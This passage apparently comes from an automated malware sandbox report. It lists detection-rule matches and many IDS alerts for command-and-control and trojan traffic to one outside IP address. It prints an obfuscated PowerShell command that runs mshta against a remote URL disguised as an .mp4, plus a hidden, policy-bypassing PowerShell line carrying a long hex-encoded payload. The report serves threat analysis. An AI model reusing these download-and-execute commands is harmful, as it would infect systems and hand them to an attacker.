]]]]]]]h]]]]]]]tt]]]]]p]]]]]]]s]]]]]]]:]]]]]]//]]]]]]pi]]]]]c]]]]]]]t]]]]]]].he]]]]]a]]]]]]]l]]]]]]t]]]]]]hc]]]]]]l]]]]]]]i]]]]]]]n]]]]]]i]]]]]]c]]]]]]-styl]]]]]]e]]]]]ma]]]]]]]v]]]]]]]e]]]]]n]]]]]]].]]]]]]]com/]]]]]]a]]]]]]]pi]]]]]]/]]]]]u]]]]]]]z/]]]]]]0]]]]]]]912]]]]]]54]]]]]]]51]]]]]64]]]]]]/index]]]]].mp]]]]]4' -replace ']')" ., ParentImage: C:\Windows\System32\OpenSSH\ssh.exe, ParentProcessId: 5896, ParentProcessName: ssh.exe, ProcessCommandLine: powershell powershell -Command ('ms]]]]]]h]]]]]]]t]]]]]a.]]]]]ex]]]]]e ]]]]]]]h]]]]]]]tt]]]]]p]]]]]]]s]]]]]]]:]]]]]]//]]]]]]pi]]]]]c]]]]]]]t]]]]]]].he]]]]]a]]]]]]]l]]]]]]t]]]]]]hc]]]]]]l]]]]]]]i]]]]]]]n]]]]]]i]]]]]]c]]]]]]-styl]]]]]]e]]]]]ma]]]]]]]v]]]]]]]e]]]]]n]]]]]]].]]]]]]]com/]]]]]]a]]]]]]]pi]]]]]]/]]]]]u]]]]]]]z/]]]]]]0]]]]]]]912]]]]]]54]]]]]]]51]]]]]64]]]]]]/index]]]]].mp]]]]]4' -replace ']'), ProcessId: 4436, ProcessName: powershell.exe
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function xmCKI($tXxJW){return -split ($tXxJW -replace '..', '0x$& ')};$LWTKB = xmCKI('A91AEEF14D627B7FAFF488DBCCFE43EDD74C8EC41DF4AFDAE86A2CACD63D2618E776AB95B16BE51714D0C93388447C10995B802510DA96A4BF1B9A934093F8EA670FE6B480A54AB53BE4B52FC1ABDD0B2F9A47D5FD8EC0B5565CF6E0D5AAA18330404F1BAB02271E1F4ADB91DA26835FBD6F294448368AE11C958F79F412C62C2B5B5ED8BC591CE31107DB0B96407294783A633B181B6CCFC9827E4078D2D612AECF34E25C3732DA701D97A8D605EA1A7C739ADF164E68BD11E6ACEC79C72BEDBA160C18420A5DB1D9810BD0B1FE135F640F78FEC268A192784340B9C69305F19E92CF4F0EF596571F8839C8ACF651D0BA0EE2D7EC50E13BE537E55036BC27049B63D09CA27C81001319E386CF456F2175699371CAD7A1A9F6165C7C5452BCA976318223F68E182DDFA4A6A6E0D3A37B3FF3D396A65B4465C3CC0736702E834F0BAAAE20F6B4E273E97BD27BF14DAB30E834EC586FA7FEB119497E06F166F11571BD5761F27FC24FD517F4F7B7D12D7114EFC8DB1E29AA9687AC4BC2A6B4BDD893E35941DAC5F77F86582F2F16A448F88F4807CB645FDC4426FF6A2A211758433846D104900F052F81898303FB3E54B3F463B628B3140A4BBD84F9E5B31E891ED77433A9B65BD1C0FEA1C06740E0BC212BC132161654E200851A5DA2BB192042E792908EA1F9C6EB7EEE004E8E047C0A08E66E6D9B8E7BCB944609F5B020CC1479272B40A2D304AC191E6C492064720ABE984D0F4CF077C873C863D03924997C8E4E627C7811BF2EBD9B06DA61C1C0B04E7EA2F2CABB41143DA53E8F7300F859AE1CFDF9875E0DFEEBD0FF7229B35B1646F5B57816308AD9D62C6CA75D45BD15C1A2B4DA51922CAA8E46AC5B09DF7821207379A305101F22EA2F6BB40DBA589322A506D5AD46DA486CF86F662522D165F38590072F1ACCF13A612369B433B00E300CFD06068817A53C68187347C9AD251D6F1F333877BAD8577C4AB84BA78F81483CBCB6BDB1E8FE6A5233FDFFF6CC9928404B2E11CFC58E38822138C47F68D6A48778E95F28D8F25C5F1A20D5A198B64B2F05536C7EA824FF816BF184FEA692844BADF041A46DC4E6A197BDA3855B32C46F4B393D58D5D4C7BFBCF82BEB6990BB2069DA637871DBFB368F1C0E6C0F2A72676CCF3B7FA358C5E09F7E9A8F481775A2D9117CF07D2ED2895D11A6B79E3CE80BD9091E7CC6FCFC76786B1A9A48950C7262C0E9607A4C88C23F16B1CD72267A4445314586554ED8498E02E1556E66E550678D68D2A7DBDBC94565DFEE58566DCE466D06C87ACD0517E92543D88380A92238E86864E5F75C12798C8828272B20A02C40B6B317F309F4D0C660C1D640DEF366D59F6E605CA9CEA69B14214C5D03DF39FC5D74B79C43D775D114603D2C9BE7F3D35D5F2C62881528C7674E5F58B568C6356FC1470BD70B46364F0545EFF33FFC0F3A9487F46E68A23603BCF5A004A1E550EB57C6E96B9828CB4973DBFCB8D62AFD7390E01D13CC7760093F91B2F0C22D85E18D540E5CBFF1D1A2466BDD39B1846617923D9C4B65A96DF2E6FCA65713714D212F0F1E8A005B0154FBD7266BA5500E44B40DDFC0174EC740D8CE82EC79B28E9071C42D33693277F784C16744C61BAB31BEF511D797C50AFCE5B6F0157F4B0B8F8201DBCAFA5813F3156ECFB13519109FF3673AEFC6E65C7966D8AFA03A8D9D665BF954962CC128461D04E92BBC3E9ACD8CA2B7120BF07F55A8EE5E4B6F185E1266C8EDDD2EE3761605723CF877A93883B9F459F8231AF5FF827049DD16CBCFA02DE3ABB97DA37D487474F6D66EFAF3D7D75CF686BD09C2D72BBEA469800332FE98AA37BAAC82515B23041CB7D36849F05AC76ED6CF4E5DEEAB16E7FFA53E4B56F7ECC66091D6B1DFAF76D3C264E80E69B82674685BF8A742080384CA722B401E88F71676753C5F86D718994E638562E8B5A9B07D82E69F8043E40065E720A1B159FDD6D422B58B784F
                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1532, ProcessName: svchost.exe
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-12T08:20:23.443744+010020292171Malware Command and Control Activity Detected185.147.124.23615647192.168.2.549716TCP
                    2024-12-12T08:21:33.391827+010020292171Malware Command and Control Activity Detected185.147.124.23615647192.168.2.549921TCP
                    2024-12-12T08:21:51.799165+010020292171Malware Command and Control Activity Detected185.147.124.23615647192.168.2.549974TCP
                    2024-12-12T08:22:12.602884+010020292171Malware Command and Control Activity Detected185.147.124.23615647192.168.2.550033TCP
                    2024-12-12T08:22:23.572694+010020292171Malware Command and Control Activity Detected185.147.124.23615647192.168.2.550062TCP
                    2024-12-12T08:22:33.272241+010020292171Malware Command and Control Activity Detected185.147.124.23615647192.168.2.550070TCP
                    2024-12-12T08:22:41.675039+010020292171Malware Command and Control Activity Detected185.147.124.23615647192.168.2.550077TCP
                    2024-12-12T08:22:45.677525+010020292171Malware Command and Control Activity Detected185.147.124.23615647192.168.2.550080TCP
                    2024-12-12T08:22:47.877739+010020292171Malware Command and Control Activity Detected185.147.124.23615647192.168.2.550083TCP
                    2024-12-12T08:23:20.486179+010020292171Malware Command and Control Activity Detected185.147.124.23615647192.168.2.550104TCP
                    2024-12-12T08:23:21.814404+010020292171Malware Command and Control Activity Detected185.147.124.23615647192.168.2.550106TCP
                    2024-12-12T08:23:36.812436+010020292171Malware Command and Control Activity Detected185.147.124.23615647192.168.2.550117TCP
                    2024-12-12T08:23:40.412465+010020292171Malware Command and Control Activity Detected185.147.124.23615647192.168.2.550120TCP
                    2024-12-12T08:23:43.276833+010020292171Malware Command and Control Activity Detected185.147.124.23615647192.168.2.550123TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-12T08:20:22.287570+010020519101A Network Trojan was detected192.168.2.549716185.147.124.23615647TCP
                    2024-12-12T08:20:22.407280+010020519101A Network Trojan was detected192.168.2.549716185.147.124.23615647TCP
                    2024-12-12T08:20:22.526769+010020519101A Network Trojan was detected192.168.2.549716185.147.124.23615647TCP
                    2024-12-12T08:20:22.646730+010020519101A Network Trojan was detected192.168.2.549716185.147.124.23615647TCP
                    2024-12-12T08:20:22.769870+010020519101A Network Trojan was detected192.168.2.549716185.147.124.23615647TCP
                    2024-12-12T08:20:22.890191+010020519101A Network Trojan was detected192.168.2.549716185.147.124.23615647TCP
                    2024-12-12T08:20:23.010223+010020519101A Network Trojan was detected192.168.2.549716185.147.124.23615647TCP
                    2024-12-12T08:20:23.130225+010020519101A Network Trojan was detected192.168.2.549716185.147.124.23615647TCP
                    2024-12-12T08:20:23.249812+010020519101A Network Trojan was detected192.168.2.549716185.147.124.23615647TCP
                    2024-12-12T08:20:23.369263+010020519101A Network Trojan was detected192.168.2.549716185.147.124.23615647TCP
                    2024-12-12T08:20:23.443898+010020519101A Network Trojan was detected192.168.2.549716185.147.124.23615647TCP
                    2024-12-12T08:20:23.488700+010020519101A Network Trojan was detected192.168.2.549716185.147.124.23615647TCP
                    2024-12-12T08:20:23.608645+010020519101A Network Trojan was detected192.168.2.549716185.147.124.23615647TCP
                    2024-12-12T08:20:23.729304+010020519101A Network Trojan was detected192.168.2.549716185.147.124.23615647TCP
                    2024-12-12T08:20:23.848971+010020519101A Network Trojan was detected192.168.2.549716185.147.124.23615647TCP
                    2024-12-12T08:21:32.196570+010020519101A Network Trojan was detected192.168.2.549921185.147.124.23615647TCP
                    2024-12-12T08:21:32.917540+010020519101A Network Trojan was detected192.168.2.549921185.147.124.23615647TCP
                    2024-12-12T08:21:50.608464+010020519101A Network Trojan was detected192.168.2.549974185.147.124.23615647TCP
                    2024-12-12T08:21:50.757192+010020519101A Network Trojan was detected192.168.2.549974185.147.124.23615647TCP
                    2024-12-12T08:21:50.790629+010020519101A Network Trojan was detected192.168.2.549974185.147.124.23615647TCP
                    2024-12-12T08:21:50.801571+010020519101A Network Trojan was detected192.168.2.549974185.147.124.23615647TCP
                    2024-12-12T08:21:51.395021+010020519101A Network Trojan was detected192.168.2.549974185.147.124.23615647TCP
                    2024-12-12T08:22:11.412656+010020519101A Network Trojan was detected192.168.2.550033185.147.124.23615647TCP
                    2024-12-12T08:22:12.032265+010020519101A Network Trojan was detected192.168.2.550033185.147.124.23615647TCP
                    2024-12-12T08:22:22.348384+010020519101A Network Trojan was detected192.168.2.550062185.147.124.23615647TCP
                    2024-12-12T08:22:23.567697+010020519101A Network Trojan was detected192.168.2.550062185.147.124.23615647TCP
                    2024-12-12T08:22:31.886053+010020519101A Network Trojan was detected192.168.2.550069185.147.124.23615647TCP
                    2024-12-12T08:22:32.064179+010020519101A Network Trojan was detected192.168.2.550070185.147.124.23615647TCP
                    2024-12-12T08:22:32.608281+010020519101A Network Trojan was detected192.168.2.550070185.147.124.23615647TCP
                    2024-12-12T08:22:33.069394+010020519101A Network Trojan was detected192.168.2.550070185.147.124.23615647TCP
                    2024-12-12T08:22:33.095885+010020519101A Network Trojan was detected192.168.2.550070185.147.124.23615647TCP
                    2024-12-12T08:22:33.120407+010020519101A Network Trojan was detected192.168.2.550070185.147.124.23615647TCP
                    2024-12-12T08:22:33.145967+010020519101A Network Trojan was detected192.168.2.550070185.147.124.23615647TCP
                    2024-12-12T08:22:33.189049+010020519101A Network Trojan was detected192.168.2.550070185.147.124.23615647TCP
                    2024-12-12T08:22:33.202453+010020519101A Network Trojan was detected192.168.2.550070185.147.124.23615647TCP
                    2024-12-12T08:22:33.215332+010020519101A Network Trojan was detected192.168.2.550070185.147.124.23615647TCP
                    2024-12-12T08:22:40.458723+010020519101A Network Trojan was detected192.168.2.550077185.147.124.23615647TCP
                    2024-12-12T08:22:40.896646+010020519101A Network Trojan was detected192.168.2.550077185.147.124.23615647TCP
                    2024-12-12T08:22:41.504990+010020519101A Network Trojan was detected192.168.2.550077185.147.124.23615647TCP
                    2024-12-12T08:22:44.482588+010020519101A Network Trojan was detected192.168.2.550080185.147.124.23615647TCP
                    2024-12-12T08:22:44.930332+010020519101A Network Trojan was detected192.168.2.550080185.147.124.23615647TCP
                    2024-12-12T08:22:45.328463+010020519101A Network Trojan was detected192.168.2.550080185.147.124.23615647TCP
                    2024-12-12T08:22:45.503998+010020519101A Network Trojan was detected192.168.2.550080185.147.124.23615647TCP
                    2024-12-12T08:22:46.686162+010020519101A Network Trojan was detected192.168.2.550083185.147.124.23615647TCP
                    2024-12-12T08:22:46.892124+010020519101A Network Trojan was detected192.168.2.550083185.147.124.23615647TCP
                    2024-12-12T08:22:47.759639+010020519101A Network Trojan was detected192.168.2.550083185.147.124.23615647TCP
                    2024-12-12T08:23:19.294243+010020519101A Network Trojan was detected192.168.2.550104185.147.124.23615647TCP
                    2024-12-12T08:23:20.131692+010020519101A Network Trojan was detected192.168.2.550104185.147.124.23615647TCP
                    2024-12-12T08:23:20.619445+010020519101A Network Trojan was detected192.168.2.550106185.147.124.23615647TCP
                    2024-12-12T08:23:35.622260+010020519101A Network Trojan was detected192.168.2.550117185.147.124.23615647TCP
                    2024-12-12T08:23:36.436124+010020519101A Network Trojan was detected192.168.2.550117185.147.124.23615647TCP
                    2024-12-12T08:23:39.207633+010020519101A Network Trojan was detected192.168.2.550120185.147.124.23615647TCP
                    2024-12-12T08:23:39.365774+010020519101A Network Trojan was detected192.168.2.550120185.147.124.23615647TCP
                    2024-12-12T08:23:42.086016+010020519101A Network Trojan was detected192.168.2.550123185.147.124.23615647TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-12T08:20:27.240216+010020522481A Network Trojan was detected192.168.2.549729185.147.124.2369000TCP
                    2024-12-12T08:20:28.783331+010020522481A Network Trojan was detected192.168.2.549730185.147.124.2369000TCP
                    2024-12-12T08:20:30.334565+010020522481A Network Trojan was detected192.168.2.549736185.147.124.2369000TCP
                    2024-12-12T08:20:31.873343+010020522481A Network Trojan was detected192.168.2.549742185.147.124.2369000TCP
                    2024-12-12T08:20:33.406702+010020522481A Network Trojan was detected192.168.2.549743185.147.124.2369000TCP
                    2024-12-12T08:20:34.936302+010020522481A Network Trojan was detected192.168.2.549749185.147.124.2369000TCP
                    2024-12-12T08:20:36.488368+010020522481A Network Trojan was detected192.168.2.549755185.147.124.2369000TCP
                    2024-12-12T08:20:38.063000+010020522481A Network Trojan was detected192.168.2.549761185.147.124.2369000TCP
                    2024-12-12T08:20:39.601047+010020522481A Network Trojan was detected192.168.2.549762185.147.124.2369000TCP
                    2024-12-12T08:20:41.177323+010020522481A Network Trojan was detected192.168.2.549768185.147.124.2369000TCP
                    2024-12-12T08:20:42.718553+010020522481A Network Trojan was detected192.168.2.549774185.147.124.2369000TCP
                    2024-12-12T08:20:44.263331+010020522481A Network Trojan was detected192.168.2.549776185.147.124.2369000TCP
                    2024-12-12T08:20:45.794335+010020522481A Network Trojan was detected192.168.2.549781185.147.124.2369000TCP
                    2024-12-12T08:20:47.326598+010020522481A Network Trojan was detected192.168.2.549787185.147.124.2369000TCP
                    2024-12-12T08:20:49.166329+010020522481A Network Trojan was detected192.168.2.549793185.147.124.2369000TCP
                    2024-12-12T08:20:50.750828+010020522481A Network Trojan was detected192.168.2.549794185.147.124.2369000TCP
                    2024-12-12T08:20:52.284565+010020522481A Network Trojan was detected192.168.2.549800185.147.124.2369000TCP
                    2024-12-12T08:20:53.841484+010020522481A Network Trojan was detected192.168.2.549806185.147.124.2369000TCP
                    2024-12-12T08:20:55.373490+010020522481A Network Trojan was detected192.168.2.549812185.147.124.2369000TCP
                    2024-12-12T08:20:56.921758+010020522481A Network Trojan was detected192.168.2.549813185.147.124.2369000TCP
                    2024-12-12T08:20:58.648113+010020522481A Network Trojan was detected192.168.2.549819185.147.124.2369000TCP
                    2024-12-12T08:21:00.196845+010020522481A Network Trojan was detected192.168.2.549825185.147.124.2369000TCP
                    2024-12-12T08:21:01.738898+010020522481A Network Trojan was detected192.168.2.549826185.147.124.2369000TCP
                    2024-12-12T08:21:03.354854+010020522481A Network Trojan was detected192.168.2.549833185.147.124.2369000TCP
                    2024-12-12T08:21:05.072777+010020522481A Network Trojan was detected192.168.2.549839185.147.124.2369000TCP
                    2024-12-12T08:21:06.637581+010020522481A Network Trojan was detected192.168.2.549840185.147.124.2369000TCP
                    2024-12-12T08:21:08.181856+010020522481A Network Trojan was detected192.168.2.549846185.147.124.2369000TCP
                    2024-12-12T08:21:09.717102+010020522481A Network Trojan was detected192.168.2.549852185.147.124.2369000TCP
                    2024-12-12T08:21:11.256983+010020522481A Network Trojan was detected192.168.2.549853185.147.124.2369000TCP
                    2024-12-12T08:21:12.804834+010020522481A Network Trojan was detected192.168.2.549859185.147.124.2369000TCP
                    2024-12-12T08:21:14.351221+010020522481A Network Trojan was detected192.168.2.549865185.147.124.2369000TCP
                    2024-12-12T08:21:15.897535+010020522481A Network Trojan was detected192.168.2.549870185.147.124.2369000TCP
                    2024-12-12T08:21:17.430782+010020522481A Network Trojan was detected192.168.2.549871185.147.124.2369000TCP
                    2024-12-12T08:21:18.975041+010020522481A Network Trojan was detected192.168.2.549877185.147.124.2369000TCP
                    2024-12-12T08:21:20.497789+010020522481A Network Trojan was detected192.168.2.549883185.147.124.2369000TCP
                    2024-12-12T08:21:22.029157+010020522481A Network Trojan was detected192.168.2.549884185.147.124.2369000TCP
                    2024-12-12T08:21:23.563463+010020522481A Network Trojan was detected192.168.2.549890185.147.124.2369000TCP
                    2024-12-12T08:21:25.107135+010020522481A Network Trojan was detected192.168.2.549896185.147.124.2369000TCP
                    2024-12-12T08:21:26.646417+010020522481A Network Trojan was detected192.168.2.549901185.147.124.2369000TCP
                    2024-12-12T08:21:28.179242+010020522481A Network Trojan was detected192.168.2.549903185.147.124.2369000TCP
                    2024-12-12T08:21:29.725608+010020522481A Network Trojan was detected192.168.2.549909185.147.124.2369000TCP
                    2024-12-12T08:21:31.365786+010020522481A Network Trojan was detected192.168.2.549914185.147.124.2369000TCP
                    2024-12-12T08:21:32.899651+010020522481A Network Trojan was detected192.168.2.549916185.147.124.2369000TCP
                    2024-12-12T08:21:34.444178+010020522481A Network Trojan was detected192.168.2.549923185.147.124.2369000TCP
                    2024-12-12T08:21:35.966946+010020522481A Network Trojan was detected192.168.2.549928185.147.124.2369000TCP
                    2024-12-12T08:21:37.640802+010020522481A Network Trojan was detected192.168.2.549932185.147.124.2369000TCP
                    2024-12-12T08:21:39.199091+010020522481A Network Trojan was detected192.168.2.549936185.147.124.2369000TCP
                    2024-12-12T08:21:40.733281+010020522481A Network Trojan was detected192.168.2.549942185.147.124.2369000TCP
                    2024-12-12T08:21:42.264147+010020522481A Network Trojan was detected192.168.2.549947185.147.124.2369000TCP
                    2024-12-12T08:21:43.795587+010020522481A Network Trojan was detected192.168.2.549949185.147.124.2369000TCP
                    2024-12-12T08:21:45.338236+010020522481A Network Trojan was detected192.168.2.549955185.147.124.2369000TCP
                    2024-12-12T08:21:46.947570+010020522481A Network Trojan was detected192.168.2.549960185.147.124.2369000TCP
                    2024-12-12T08:21:48.485451+010020522481A Network Trojan was detected192.168.2.549962185.147.124.2369000TCP
                    2024-12-12T08:21:50.014607+010020522481A Network Trojan was detected192.168.2.549968185.147.124.2369000TCP
                    2024-12-12T08:21:52.107679+010020522481A Network Trojan was detected192.168.2.549975185.147.124.2369000TCP
                    2024-12-12T08:21:53.722664+010020522481A Network Trojan was detected192.168.2.549980185.147.124.2369000TCP
                    2024-12-12T08:21:55.256500+010020522481A Network Trojan was detected192.168.2.549986185.147.124.2369000TCP
                    2024-12-12T08:21:56.793962+010020522481A Network Trojan was detected192.168.2.549988185.147.124.2369000TCP
                    2024-12-12T08:21:58.326924+010020522481A Network Trojan was detected192.168.2.549993185.147.124.2369000TCP
                    2024-12-12T08:21:59.876083+010020522481A Network Trojan was detected192.168.2.549999185.147.124.2369000TCP
                    2024-12-12T08:22:01.411084+010020522481A Network Trojan was detected192.168.2.550001185.147.124.2369000TCP
                    2024-12-12T08:22:02.949154+010020522481A Network Trojan was detected192.168.2.550007185.147.124.2369000TCP
                    2024-12-12T08:22:04.483896+010020522481A Network Trojan was detected192.168.2.550012185.147.124.2369000TCP
                    2024-12-12T08:22:06.190612+010020522481A Network Trojan was detected192.168.2.550014185.147.124.2369000TCP
                    2024-12-12T08:22:07.745866+010020522481A Network Trojan was detected192.168.2.550019185.147.124.2369000TCP
                    2024-12-12T08:22:09.288314+010020522481A Network Trojan was detected192.168.2.550025185.147.124.2369000TCP
                    2024-12-12T08:22:10.857565+010020522481A Network Trojan was detected192.168.2.550030185.147.124.2369000TCP
                    2024-12-12T08:22:12.396570+010020522481A Network Trojan was detected192.168.2.550032185.147.124.2369000TCP
                    2024-12-12T08:22:13.920443+010020522481A Network Trojan was detected192.168.2.550039185.147.124.2369000TCP
                    2024-12-12T08:22:15.451178+010020522481A Network Trojan was detected192.168.2.550044185.147.124.2369000TCP
                    2024-12-12T08:22:16.992116+010020522481A Network Trojan was detected192.168.2.550046185.147.124.2369000TCP
                    2024-12-12T08:22:18.531064+010020522481A Network Trojan was detected192.168.2.550052185.147.124.2369000TCP
                    2024-12-12T08:22:20.060280+010020522481A Network Trojan was detected192.168.2.550057185.147.124.2369000TCP
                    2024-12-12T08:22:21.592672+010020522481A Network Trojan was detected192.168.2.550059185.147.124.2369000TCP
                    2024-12-12T08:22:23.157456+010020522481A Network Trojan was detected192.168.2.550061185.147.124.2369000TCP
                    2024-12-12T08:22:24.693899+010020522481A Network Trojan was detected192.168.2.550063185.147.124.2369000TCP
                    2024-12-12T08:22:26.243959+010020522481A Network Trojan was detected192.168.2.550064185.147.124.2369000TCP
                    2024-12-12T08:22:27.779953+010020522481A Network Trojan was detected192.168.2.550065185.147.124.2369000TCP
                    2024-12-12T08:22:29.361748+010020522481A Network Trojan was detected192.168.2.550066185.147.124.2369000TCP
                    2024-12-12T08:22:30.897485+010020522481A Network Trojan was detected192.168.2.550067185.147.124.2369000TCP
                    2024-12-12T08:22:32.445741+010020522481A Network Trojan was detected192.168.2.550068185.147.124.2369000TCP
                    2024-12-12T08:22:33.993469+010020522481A Network Trojan was detected192.168.2.550071185.147.124.2369000TCP
                    2024-12-12T08:22:35.537822+010020522481A Network Trojan was detected192.168.2.550072185.147.124.2369000TCP
                    2024-12-12T08:22:37.078887+010020522481A Network Trojan was detected192.168.2.550073185.147.124.2369000TCP
                    2024-12-12T08:22:38.616823+010020522481A Network Trojan was detected192.168.2.550074185.147.124.2369000TCP
                    2024-12-12T08:22:40.155752+010020522481A Network Trojan was detected192.168.2.550075185.147.124.2369000TCP
                    2024-12-12T08:22:41.685871+010020522481A Network Trojan was detected192.168.2.550076185.147.124.2369000TCP
                    2024-12-12T08:22:43.217997+010020522481A Network Trojan was detected192.168.2.550078185.147.124.2369000TCP
                    2024-12-12T08:22:44.762063+010020522481A Network Trojan was detected192.168.2.550079185.147.124.2369000TCP
                    2024-12-12T08:22:46.319486+010020522481A Network Trojan was detected192.168.2.550081185.147.124.2369000TCP
                    2024-12-12T08:22:47.857920+010020522481A Network Trojan was detected192.168.2.550082185.147.124.2369000TCP
                    2024-12-12T08:22:49.390178+010020522481A Network Trojan was detected192.168.2.550084185.147.124.2369000TCP
                    2024-12-12T08:22:50.920508+010020522481A Network Trojan was detected192.168.2.550085185.147.124.2369000TCP
                    2024-12-12T08:22:52.461292+010020522481A Network Trojan was detected192.168.2.550086185.147.124.2369000TCP
                    2024-12-12T08:22:54.001817+010020522481A Network Trojan was detected192.168.2.550087185.147.124.2369000TCP
                    2024-12-12T08:22:55.539578+010020522481A Network Trojan was detected192.168.2.550088185.147.124.2369000TCP
                    2024-12-12T08:22:57.554609+010020522481A Network Trojan was detected192.168.2.550089185.147.124.2369000TCP
                    2024-12-12T08:22:59.100326+010020522481A Network Trojan was detected192.168.2.550090185.147.124.2369000TCP
                    2024-12-12T08:23:00.636764+010020522481A Network Trojan was detected192.168.2.550091185.147.124.2369000TCP
                    2024-12-12T08:23:02.180164+010020522481A Network Trojan was detected192.168.2.550092185.147.124.2369000TCP
                    2024-12-12T08:23:03.720078+010020522481A Network Trojan was detected192.168.2.550093185.147.124.2369000TCP
                    2024-12-12T08:23:05.259644+010020522481A Network Trojan was detected192.168.2.550094185.147.124.2369000TCP
                    2024-12-12T08:23:06.834496+010020522481A Network Trojan was detected192.168.2.550095185.147.124.2369000TCP
                    2024-12-12T08:23:08.552308+010020522481A Network Trojan was detected192.168.2.550096185.147.124.2369000TCP
                    2024-12-12T08:23:10.100473+010020522481A Network Trojan was detected192.168.2.550097185.147.124.2369000TCP
                    2024-12-12T08:23:11.647035+010020522481A Network Trojan was detected192.168.2.550098185.147.124.2369000TCP
                    2024-12-12T08:23:13.179463+010020522481A Network Trojan was detected192.168.2.550099185.147.124.2369000TCP
                    2024-12-12T08:23:14.731035+010020522481A Network Trojan was detected192.168.2.550100185.147.124.2369000TCP
                    2024-12-12T08:23:16.273791+010020522481A Network Trojan was detected192.168.2.550101185.147.124.2369000TCP
                    2024-12-12T08:23:17.812365+010020522481A Network Trojan was detected192.168.2.550102185.147.124.2369000TCP
                    2024-12-12T08:23:19.343977+010020522481A Network Trojan was detected192.168.2.550103185.147.124.2369000TCP
                    2024-12-12T08:23:20.873820+010020522481A Network Trojan was detected192.168.2.550105185.147.124.2369000TCP
                    2024-12-12T08:23:22.422696+010020522481A Network Trojan was detected192.168.2.550107185.147.124.2369000TCP
                    2024-12-12T08:23:24.030101+010020522481A Network Trojan was detected192.168.2.550108185.147.124.2369000TCP
                    2024-12-12T08:23:25.563504+010020522481A Network Trojan was detected192.168.2.550109185.147.124.2369000TCP
                    2024-12-12T08:23:27.095613+010020522481A Network Trojan was detected192.168.2.550110185.147.124.2369000TCP
                    2024-12-12T08:23:28.632572+010020522481A Network Trojan was detected192.168.2.550111185.147.124.2369000TCP
                    2024-12-12T08:23:30.175475+010020522481A Network Trojan was detected192.168.2.550112185.147.124.2369000TCP
                    2024-12-12T08:23:31.734844+010020522481A Network Trojan was detected192.168.2.550113185.147.124.2369000TCP
                    2024-12-12T08:23:33.266686+010020522481A Network Trojan was detected192.168.2.550114185.147.124.2369000TCP
                    2024-12-12T08:23:34.796806+010020522481A Network Trojan was detected192.168.2.550115185.147.124.2369000TCP
                    2024-12-12T08:23:36.326408+010020522481A Network Trojan was detected192.168.2.550116185.147.124.2369000TCP
                    2024-12-12T08:23:37.872595+010020522481A Network Trojan was detected192.168.2.550118185.147.124.2369000TCP
                    2024-12-12T08:23:39.413813+010020522481A Network Trojan was detected192.168.2.550119185.147.124.2369000TCP
                    2024-12-12T08:23:40.959504+010020522481A Network Trojan was detected192.168.2.550121185.147.124.2369000TCP
                    2024-12-12T08:23:42.491618+010020522481A Network Trojan was detected192.168.2.550122185.147.124.2369000TCP
                    2024-12-12T08:23:44.039504+010020522481A Network Trojan was detected192.168.2.550124185.147.124.2369000TCP
                    2024-12-12T08:23:45.586977+010020522481A Network Trojan was detected192.168.2.550125185.147.124.2369000TCP
                    2024-12-12T08:23:47.144311+010020522481A Network Trojan was detected192.168.2.550126185.147.124.2369000TCP
                    2024-12-12T08:23:48.678275+010020522481A Network Trojan was detected192.168.2.550127185.147.124.2369000TCP
                    2024-12-12T08:23:50.201751+010020522481A Network Trojan was detected192.168.2.550128185.147.124.2369000TCP
                    2024-12-12T08:23:51.732886+010020522481A Network Trojan was detected192.168.2.550129185.147.124.2369000TCP
                    2024-12-12T08:23:53.266335+010020522481A Network Trojan was detected192.168.2.550130185.147.124.2369000TCP
                    2024-12-12T08:23:54.804045+010020522481A Network Trojan was detected192.168.2.550131185.147.124.2369000TCP
                    2024-12-12T08:23:56.364749+010020522481A Network Trojan was detected192.168.2.550132185.147.124.2369000TCP
                    2024-12-12T08:23:57.889654+010020522481A Network Trojan was detected192.168.2.550133185.147.124.2369000TCP
                    2024-12-12T08:23:59.420235+010020522481A Network Trojan was detected192.168.2.550134185.147.124.2369000TCP
                    2024-12-12T08:24:00.951215+010020522481A Network Trojan was detected192.168.2.550135185.147.124.2369000TCP
                    2024-12-12T08:24:02.490296+010020522481A Network Trojan was detected192.168.2.550136185.147.124.2369000TCP
                    2024-12-12T08:24:04.021293+010020522481A Network Trojan was detected192.168.2.550137185.147.124.2369000TCP
                    2024-12-12T08:24:05.555408+010020522481A Network Trojan was detected192.168.2.550138185.147.124.2369000TCP
                    2024-12-12T08:24:07.125667+010020522481A Network Trojan was detected192.168.2.550139185.147.124.2369000TCP
                    2024-12-12T08:24:08.654349+010020522481A Network Trojan was detected192.168.2.550140185.147.124.2369000TCP
                    2024-12-12T08:24:10.185431+010020522481A Network Trojan was detected192.168.2.550141185.147.124.2369000TCP
                    2024-12-12T08:24:11.732456+010020522481A Network Trojan was detected192.168.2.550142185.147.124.2369000TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-12T08:20:30.334565+010028033053Unknown Traffic192.168.2.549736185.147.124.2369000TCP
                    2024-12-12T08:20:31.873343+010028033053Unknown Traffic192.168.2.549742185.147.124.2369000TCP
                    2024-12-12T08:20:38.063000+010028033053Unknown Traffic192.168.2.549761185.147.124.2369000TCP
                    2024-12-12T08:20:39.601047+010028033053Unknown Traffic192.168.2.549762185.147.124.2369000TCP
                    2024-12-12T08:20:41.177323+010028033053Unknown Traffic192.168.2.549768185.147.124.2369000TCP
                    2024-12-12T08:20:42.718553+010028033053Unknown Traffic192.168.2.549774185.147.124.2369000TCP
                    2024-12-12T08:20:44.263331+010028033053Unknown Traffic192.168.2.549776185.147.124.2369000TCP
